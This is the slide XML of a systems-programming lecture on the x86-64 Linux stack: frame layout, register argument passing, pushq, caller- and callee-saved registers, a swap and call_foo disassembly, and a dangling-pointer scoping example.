          <a:p>
            <a:pPr marL="223838" indent="-217488" eaLnBrk="1" hangingPunct="1"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05192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9960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4135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578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5876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4452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foo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foo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foo(…)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8191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67437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x86-64/Linux Stack Frame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4572000" cy="5011738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Caller Stack Frame (Pink)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Function arguments for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950" eaLnBrk="1" hangingPunct="1"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Only used with 7+ integer arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950" eaLnBrk="1" hangingPunct="1"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Arguments 1-6 passed in registers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Return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950" eaLnBrk="1" hangingPunct="1"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Pushed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p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err="1" smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Stack Frame (Yellow) (From Top to Bottom)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Old frame pointer (optional)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Local variables (optional)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950" eaLnBrk="1" hangingPunct="1"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If can’t keep in registers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Saved register context (optional)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950" eaLnBrk="1" hangingPunct="1"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If certain registers needed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/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Function arguments for next call</a:t>
            </a:r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6096000" y="6019800"/>
            <a:ext cx="889000" cy="1588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5078413" y="5616575"/>
            <a:ext cx="1641475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 Pointer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>
            <a:off x="6061075" y="3422650"/>
            <a:ext cx="965200" cy="1588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5043488" y="2943225"/>
            <a:ext cx="1734192" cy="920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Frame Pointer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rbp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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:b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(optional)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7037388" y="2959100"/>
            <a:ext cx="1358900" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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Return Addr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7037388" y="3568700"/>
            <a:ext cx="1371600" cy="18161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Saved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Registers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+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Local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Variables</a:t>
            </a:r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7037388" y="5410200"/>
            <a:ext cx="1371600" cy="7366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Arguments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7+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7037388" y="1143000"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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7024688" y="3263900"/>
            <a:ext cx="1384300" cy="3048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Old %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ebp</a:t>
            </a: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7037388" y="2362200"/>
            <a:ext cx="1358900" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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Arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:b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7+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5718175" y="1828800"/>
            <a:ext cx="865188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Caller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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16399" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="11430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4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6698672" y="3568700"/>
            <a:ext cx="235527" cy="25781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5709108" y="4536281"/>
            <a:ext cx="874255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Arial" charset="0"/>
              </a:rPr>
              <a:t>Callee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Frame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0772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x86-64/Linux Stack Frame (aside)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5011738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Compiler can decide to simplify implementation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Can omit local variables and saved registers for simple functions with few variables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Can avoid using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>popq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to manage frame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Can even avoid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call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instruction!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2" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="290513" y="1220788"/>
            <a:ext cx="4073525" cy="11271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5pPr>
            <a:lvl6pPr marL="22860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6pPr>
            <a:lvl7pPr marL="27432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7pPr>
            <a:lvl8pPr marL="32004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8pPr>
            <a:lvl9pPr marL="36576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9pPr>
          </a:lstStyle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kern="0" dirty="0" smtClean="0"/>
              <a:t>Passed in registers typically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kern="0" dirty="0" smtClean="0"/>
              <a:t>First 6 “integer” arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" kern="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="679450" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="005400"/>
              </a:buClr>
              <a:buSzPct val="9000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600" kern="0" dirty="0"/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1701800" y="2286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1701800" y="2667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1701800" y="3048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1701800" y="3429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1701800" y="3810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1701800" y="41910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00" y="1966912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 smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>• •</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty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chemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>•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 smtClean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 smtClean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  <a:endParaRPr lang="en-US" sz="1800" i="1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endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 2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4516438" y="1220788"/>
            <a:ext cx="4398962" cy="53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5pPr>
            <a:lvl6pPr marL="22860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6pPr>
            <a:lvl7pPr marL="27432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7pPr>
            <a:lvl8pPr marL="32004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8pPr>
            <a:lvl9pPr marL="36576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9pPr>
          </a:lstStyle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kern="0" dirty="0" smtClean="0"/>
              <a:t>Overflow onto stack when needed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3707317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3505200" y="5067012"/>
            <a:ext cx="4398962" cy="53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b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5pPr>
            <a:lvl6pPr marL="22860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6pPr>
            <a:lvl7pPr marL="27432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7pPr>
            <a:lvl8pPr marL="32004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8pPr>
            <a:lvl9pPr marL="3657600" indent="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 b="1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9pPr>
          </a:lstStyle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kern="0" dirty="0" smtClean="0"/>
              <a:t>Return value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New Bold" panose="02070609020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New Bold" panose="02070609020205020404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8550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x86-64 stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290513" y="1220788"/>
            <a:ext cx="5119687" cy="5218112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="153988" lvl="0" indent="-220663" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75000"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Region of memory managed with last-in, first-out discipline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-2413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8188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  <a:tab pos="9594850" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grows toward lower addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-241300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8188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  <a:tab pos="9594850" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Register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indicates top element of stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-2349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38188" algn="l"/>
                <a:tab pos="908050" algn="l"/>
                <a:tab pos="1365250" algn="l"/>
                <a:tab pos="1822450" algn="l"/>
                <a:tab pos="2279650" algn="l"/>
                <a:tab pos="2736850" algn="l"/>
                <a:tab pos="3194050" algn="l"/>
                <a:tab pos="3651250" algn="l"/>
                <a:tab pos="4108450" algn="l"/>
                <a:tab pos="4565650" algn="l"/>
                <a:tab pos="5022850" algn="l"/>
                <a:tab pos="5480050" algn="l"/>
                <a:tab pos="5937250" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6851650" algn="l"/>
                <a:tab pos="7308850" algn="l"/>
                <a:tab pos="7766050" algn="l"/>
                <a:tab pos="8223250" algn="l"/>
                <a:tab pos="8680450" algn="l"/>
                <a:tab pos="9137650" algn="l"/>
                <a:tab pos="9594850" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Top element has lowest address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413" eaLnBrk="1" hangingPunct="1"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The stack is essential for function calls</a:t>
            </a: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>
            <a:off x="5621337" y="5311773"/>
            <a:ext cx="501650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598987" y="4573586"/>
            <a:ext cx="977900" cy="920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Pointer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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132512" y="1981200"/>
            <a:ext cx="1292225" cy="35052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9" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7504112" y="4114800"/>
            <a:ext cx="1588" cy="13716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7580312" y="4495800"/>
            <a:ext cx="1563688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 Grows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Down</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7504112" y="1981200"/>
            <a:ext cx="0" cy="129222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7580312" y="2286000"/>
            <a:ext cx="1346200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Increasing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Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6954837" y="5497513"/>
            <a:ext cx="647700" cy="3937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6842125" y="5961063"/>
            <a:ext cx="150177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“Top”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6818312" y="838200"/>
            <a:ext cx="18827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“Bottom”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7192962" y="1295400"/>
            <a:ext cx="469900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93700" y="1252538"/>
            <a:ext cx="4343400" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD"/>
          </a:solidFill>
          <a:ln w="12600" cap="sq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void swap(long *xp, long *yp)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long t0 = *xp;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long t1 = *yp;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*xp = t1;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*yp = t0;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5105400" y="1130300"/>
            <a:ext cx="3657600" cy="22438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swap:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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(%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(%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, (%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, (%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	ret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</a:rPr>
              <a:t>swap revisited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3429000"/>
            <a:ext cx="8301037" cy="3009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Function arguments all passed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registers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First argument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(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</a:rPr>
              <a:t>xp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) in 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, second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argument (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yp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) in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty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2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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64-bit pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-37147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No stack operations required (except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Can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hold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all function arguments and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local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variables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</a:rPr>
              <a:t>in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</a:rPr>
              <a:t>registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-238125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lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Does not call another function so frame allocation not necessary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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arguments beyond 6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301037" cy="521811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Given the above C function, identify function arguments being passed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914400"/>
            <a:ext cx="678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call_foo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long a[16];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(a[0],a[1],a[2],a[3],a[4],a[5],a[6],a[7],a[8],a[9]);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2590800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0000000000000000 &lt;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call_foo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0:	sub    $0xA8,%rsp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0x68(%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c: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%rax,0x18(%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11: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0x60(%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16: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1b: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0x58(%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0x50(%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2a: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0x48(%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),%r9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0x40(%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),%r8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38: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0x38(%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3d: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0x30(%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0x28(%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0x20(%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4c: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callq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51:	add    $0xA8,%rsp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58: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retq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371600" y="3505200"/>
            <a:ext cx="3429000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B8FF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371600" y="3886200"/>
            <a:ext cx="3429000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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4343400"/>
            <a:ext cx="3429000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0000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371600" y="3048000"/>
            <a:ext cx="3429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44196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a[6]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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39624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a[7]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35052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a[8]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31242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a[9]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600" y="57912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a[0]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0600" y="49530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a[4]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00600" y="54102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a[2]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51816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a[3]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600" y="55626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a[1]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00600" y="472440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a[5]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Local variables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Held in registers if possible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Allocate space on stack if too many (register spilling)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Compiler allocates space on stack and updates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endParaRPr lang="en-US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How are they preserved if the current function calls another function?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Compiler updates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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> beyond local variables before issuing “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”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What happens to them when the current function returns?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Are lost (i.e. no longer valid)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914400"/>
            <a:ext cx="678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call_foo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long a[16];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(a[0],a[1],a[2],a[3],a[4],a[5],a[6],a[7],a[8],a[9]);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2133600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0000000000000000 &lt;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call_foo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0:	sub    $0xA8,%rsp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0x68(%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c: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%rax,0x18(%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11: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0x60(%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16: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1b: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0x58(%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%rax,0x8(%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0x50(%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2a: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2e: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0x48(%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),%r9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0x40(%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),%r8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38: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0x38(%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3d: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0x30(%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0x28(%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0x20(%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4c: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callq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51:	add    $0xA8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p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58: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retq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295400" y="5791200"/>
            <a:ext cx="3429000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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371600" y="2362200"/>
            <a:ext cx="3429000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0000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1371600" y="1143000"/>
            <a:ext cx="3429000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="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4876800" y="2514600"/>
            <a:ext cx="1828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800600" y="2590800"/>
            <a:ext cx="4158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Makes room for both a[16] and partial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argument build for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4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134938"/>
            <a:ext cx="8716962" cy="10080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Scoping issues with local variables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Consider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-23971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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func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x) {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n;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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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	n = x;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np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = &amp;n;</a:t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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-239713" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzPct val="75000"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sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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What does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dirty="0" smtClean="0"/>
              <a:t> point to after function returns?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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What happens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np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dereferenced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone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Local variables are “lost” when function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="7445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Address referred to is no longer part of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="7445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Can be overwritten by other function calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-239713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44538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/>
              <a:t>Dereference will return whatever is at location (can be arbitrary)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0450" y="6324600"/>
            <a:ext cx="724852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http://thefengs.com/wuchang/courses/cs201/class/08/invalid_ref.c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Putting it all together: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7144793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 smtClean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5226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514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661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514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671786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99887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514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rgbClr val="FF0000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9776174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&amp;v1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70321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514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  <a:endParaRPr lang="en-US" sz="1800" b="1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0004284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803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Stack Pushing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Pushing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pushq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/>
              <a:t>Src</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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Fetch operand at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Src</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1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Decrement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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> by 8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Write operand at address given by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r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> 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i="1" dirty="0" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushq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endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950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subq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $8, 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 smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,(%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 marL="738188" lvl="1" indent="-241300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>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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5621337" y="5311773"/>
            <a:ext cx="501650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18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4598987" y="4573586"/>
            <a:ext cx="977900" cy="920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Pointer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40" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5621337" y="5005388"/>
            <a:ext cx="508000" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="B2B2B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6132512" y="1981200"/>
            <a:ext cx="1292225" cy="32004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42" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7504112" y="4114800"/>
            <a:ext cx="1588" cy="13716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7580312" y="4495800"/>
            <a:ext cx="1563688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 Grows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Down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V="1">
            <a:off x="7504112" y="1981200"/>
            <a:ext cx="0" cy="129222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7580312" y="2286000"/>
            <a:ext cx="1346200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Increasing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Addresses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 flipH="1" flipV="1">
            <a:off x="6954837" y="5497513"/>
            <a:ext cx="647700" cy="3937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6842125" y="5961063"/>
            <a:ext cx="150177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“Top”</a:t>
            </a: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6132512" y="4876800"/>
            <a:ext cx="1295400" cy="1588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6818312" y="838200"/>
            <a:ext cx="18827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“Bottom”</a:t>
            </a:r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 flipH="1">
            <a:off x="7192962" y="1295400"/>
            <a:ext cx="469900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6132512" y="5181600"/>
            <a:ext cx="1292225" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00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2" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5760819" y="5021263"/>
            <a:ext cx="275075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Arial" charset="0"/>
              </a:rPr>
              <a:t>-8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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5751512" y="5029200"/>
            <a:ext cx="1588" cy="3048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6" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="5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Example: Calling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 smtClean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514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57685658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133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6073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74676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Register Saving Conventions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819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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>caller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who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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Can Register be Used for Temporary Storage?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Need some coordination between caller and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on register usage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Conventions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“Caller Save”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 saves temporary in its frame before calling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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Save”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/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> saves temporary in its frame before using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/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> restores values before returning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caller-saved registers</a:t>
            </a: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Can be modified by function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="496888" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75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 smtClean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Return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508000" lvl="1" indent="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latin typeface="Courier New Bold" charset="0"/>
                <a:cs typeface="Courier New Bold" charset="0"/>
                <a:sym typeface="Courier New Bold" charset="0"/>
              </a:rPr>
              <a:t>rdi,%rsi,%rdx</a:t>
            </a:r>
            <a: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  <a:t/>
            </a:r>
            <a:b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</a:br>
            <a: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  <a:t>%rcx,%r8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
                <a:cs typeface="Courier New Bold" charset="0"/>
                <a:sym typeface="Courier New Bold" charset="0"/>
              </a:rPr>
